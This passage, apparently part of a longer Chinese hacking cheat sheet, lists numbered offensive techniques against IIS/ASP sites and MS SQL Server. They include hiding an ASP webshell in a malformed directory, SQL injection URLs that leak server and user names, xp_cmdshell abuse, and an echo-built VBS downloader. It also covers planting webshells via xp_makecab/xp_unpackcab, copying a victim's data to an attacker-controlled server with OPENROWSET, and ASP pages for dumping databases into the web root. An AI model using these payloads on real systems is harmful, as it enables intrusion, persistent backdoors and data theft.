22、如何隐藏ASP木马:
建立非标准目录:mkdir images../
拷贝ASP木马至目录:copy c:/inetpub/wwwroot/dbm6.asp c:/inetpub/wwwroot/images../news.asp
通过web访问ASP木马:http://ip/images../news.asp?action=login
如何删除非标准目录:rmdir images../ /s
23、去掉tenlnet的ntlm认证:
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'—
24、用echo写入文件下载脚本iget.vbs:
(1)echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:/iget.vbs
(2)c:/>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp
25、手工建立IIS隐藏目录的方法:
查看本地虚拟目录列表:cscript.exe c:/inetpub/AdminScripts/adsutil.vbs enum w3svc/1/root
新建一个kiss目录:mkdir c:/asp/kiss
建立kiss虚拟目录:cscript.exe c:/inetpub/AdminScripts/mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:/asp/kiss"
为kiss目录加执行和写权限:
cscript.exe c:/inetpub/AdminScripts/adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:/inetpub/AdminScripts/adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
?:Cscript c:/inetpub/AdminScripts/adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
访问:http://127.0.0.1/kiss/test.asp
26、使用openrowset()连回本地做测试:
SELECT a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]') AS a
SELECT * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]')
27、获得主机名:
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername
28、获得数据库用户名:
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user
29、普通用户获得WEBSHELL的方法之二:
打包:
EXEC [master].[dbo].[xp_makecab] 'c:/test.rar','default',1,'d:/cmd.asp'
解包,可以用于得到webshell:
EXEC [master].[dbo].[xp_unpackcab] 'C:/test.rar','c:',1, 'n.asp'
读任意文件内容,要求有master的dbo权限:
EXEC [master].[dbo].[xp_readerrorlog] 1,'c:/cmd.asp'
30、sa 权限下已知web路径直接备份数据库到web路径下
http://www.XXXX.com/FullStory.asp?id=1;backuup database 数据库名 to disk='c:/inetpub/wwwroot/save.db' 则把得到的数据内容全部备份到WEB目录下,再用HTTP把此文件下载(当然首选要知道WEB虚拟目录)。
遍历系统的目录结构,分析结果并发现WEB虚拟目录,先创建一个临时表:temp
http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
接下来:我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:
http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中:
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:/';--
我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- 这样就可以成功的浏览到所有的目录(文件夹)列表
如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:/web/index.asp';--
使用'bulk insert'语法可以将一个文本文件插入到一个临时表中。如:bulk insert temp(id) from 'c:/inetpub/wwwroot/index.asp' 浏览temp就可以看到index.asp文件的内容了!通过分析各种ASP文件,可以得到大量系统信息,WEB建设与管理信息,甚至可以得到SA帐号的连接密码。
31、一些sql中的扩展存储的总结:
xp_availablemedia 显示系统上可用的盘符'C:/' xp_availablemedia
xp_enumgroups 列出当前系统的使用群组及其说明 xp_enumgroups
xp_enumdsn 列出系统上已经设置好的ODBC数据源名称 xp_enumdsn
xp_dirtree 显示某个目录下的子目录与文件架构 xp_dirtree 'C:/inetpub/wwwroot/'
xp_getfiledetails 获取某文件的相关属性 xp_getfiledetails 'C:/inetpub/wwwroot.asp'
dbp.xp_makecab 将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开 dbp.xp_makecab 'C:/lin.cab','evil',1,'C:/inetpub/mdb.asp'
xp_unpackcab 解压缩 xp_unpackcab 'C:/hackway.cab','C:/temp',1
xp_ntsec_enumdomains 列出服务器域名 xp_ntsec_enumdomains
xp_servicecontrol 停止或者启动某个服务 xp_servicecontrol 'stop','schedule'
xp_terminate_process 用pid来停止某个执行中的程序 xp_terminate_process 123
dbo.xp_subdirs 只列某个目录下的子目录 dbo.xp_subdirs 'C:/'
32、
USE MASTER
GO
CREATE proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
end
/* Create the select */
/* Use @isobject variable isstead of IsUserTable string */
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
exec(@postcommand)
return @retval
GO
/*
1。获得所有的存储过程的脚本:
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2。获得所有的视图的脚本:
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/
33、DB_OWNER权限下的数据库备份方法
用openrowset吧。反连到自己的数据库机器,~先在本地建个跟目标机器一样结构的表~字段类型使用nvarchar.然后用海洋连接对方的SQL数据库,在查询分析那里执行
insert into OPENROWSET ('sqloledb','server=你数据库服务器的IP;uid=user;pwd=pass;database=dbname;','select * from 你建立的表) select * from 对方的表—
要是数据量太大的话就看看他数据库里有没有自动编号的字段.select * from 表名 where id>100
这样来弄吧
要是和WEB同台的话,直接将库BAK到WEB目录下回来就OK啦。。。不过前提库不能太大,超过2G的话SQL就超时了
如果是SA权限可以利用下面的两个ASP程序来备份数据库:
sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQL Server 数据库的备份与恢复</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
选择操作:<INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup>备份</label>
<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>恢复</label>
<br>数据库名:<INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>文件路径:<INPUT TYPE="text" NAME="bak_file" value="c:/1.exe">(备份或恢复的文件路径,备份成EXE主要为了方便下载,活活..)<br>
<input type="submit" value="确定">
</form>
<%
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = "localhost" 'sql服务器
sqlname = "sa" '用户名
sqlpassword = "数据库密码" '密码
sqlLoginTimeout = 15 '登陆超时
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>备份成功!</font>"
elseif act = "restore" then
'恢复时要在没有使用数据库时进行!
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv
Response.write "<font color=green>恢复成功!</font>"
else
Response.write "<font color=red>没有选择操作</font>"
end if
end if
%>
</BODY>
</HTML>
sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>采飞扬ASP备份MSSQL数据库程序 V1.0--QQ:79998575</title>
</head>
<style>
BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}TABLE { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: none; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.tr { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; text-align: center;}.td { font-family: "Courier New"; font-size: 9pt; background-color: #f9f9fd;}.warningColor { font-family: "Courier New"; font-size: 9pt; color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px; color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none;}tr { font-family: "Courier New"; font-size: 9pt; line-height: 18px;}td { font-family: "Courier New"; font-size: 9pt; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: none; border-right-style: solid; border-bottom-style: solid; border-left-style: none; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.trHead { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; line-height: 3px;}.inputLogin { font-family: "Courier New"; font-size: 9pt; border: 1px solid #d8d8f0; background-color: #f9f9fd; vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">采飞扬ASP备份MSSQL数据库程序 V1.0 </font></td>
</tr>
<tr>
<td>选择操作:
<input type="radio" name="act" id="act_backup"value="backup" />
<label for=act_backup>备份</label>
<input type="radio" name="act" id="act_restore" value="restore" />
<label for=act_restore>恢复</label></td>
</tr>
<tr>
<td><label>SQL服务器:
<input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>用户名:
<input name="sqlname" type="text" value="sa" />
密 码:
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>数据库名:
<input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td>文件路径:
<input name="bak_file" type="text" value="<% =server.MapPath("/")&"/"&"liuyes.bak"%>" size="60" />
(备份或恢复的文件路径)</td>
</tr>
<tr>
<td><% Response.write "本文件绝对路径:" %>
<font color="#FF0000">
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
</font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="确 定" />
<input name="Submit" type="reset" class="liuyes" size="10" value="重 置" /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>提示信息:<%
if request("action")="" then
response.write "<font color=#ff0000>不用我多说什么了吧!</font>"
end if
'SQL Server 数据库的备份与恢复!
if request("action")="backupdatabase" Then
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = trim(request("sqlserver"))
sqlname = trim(request("sqlname"))
sqlpassword =trim(request("sqlpassword"))
sqlLoginTimeout = 15
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "<font color=#ff0000>没有输入数据库名称!</font>"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Action = 0
bak.Initialize = 1
'bak.Replace = True
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>备份成功!</font>"
elseif act="restore" then
'恢复时要在没有使用数据库时进行!
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv
Response.write "<font color=green>恢复成功!</font>"
else
Response.write "<font color=red>请选择备份或恢复!</font>"
end if
end if
end if
%></td>
</tr>
</table>
</body>
</html>